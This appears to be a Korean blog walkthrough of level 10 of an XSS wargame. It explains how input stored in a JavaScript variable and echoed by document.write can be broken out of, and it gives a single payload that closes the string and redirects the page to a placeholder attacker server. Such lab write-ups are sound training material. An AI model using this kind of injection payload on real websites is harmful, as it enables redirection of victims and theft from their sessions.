XSS Challenges 10

level 10단계를 진행하겠습니다. 표면상 보이는 화면은 이전과 유사한 모습을 띄우고 있습니다. 내부 코드를 먼저 살펴보도록 하겠습니다.

 

10단계에서는 a와 b라는 변수와 값이 선언되어 있는 상태입니다. 우리가 입력할 Payload는 "a" 변수에 담기도록 되어있는데 document.write 속성을 통해 값이 실행되는 것을 보실 수 있습니다.

 

document.write()의 기능은 Document Object의 함수로 인수 값을 웹 브러우저 화면에 텍스트 형식으로 출력해주는 기능을 가지고 있습니다.

 

';{document.location.href="http://IP"}//

9단계에서 진행한 방법대로 a변수를 닫아 마무리(;)해주고 공격자 서버를 로드시켜 스크립트가 실행되도록 해주면 될 것 같습니다. 뒤에 더블 슬러쉬"//"는 맨 끝의 싱글 쿼터" ' "를 주석 처리하여 에러가 나타나지 않도록 해줘야 됩니다.

 

.php?p= 파라미터에 올바른 Payload를 삽입해 요청해보도록 하겠습니다.

 

다이얼로그 창이 나타나면 이제 다음 단계로 넘어가 봅시다.!!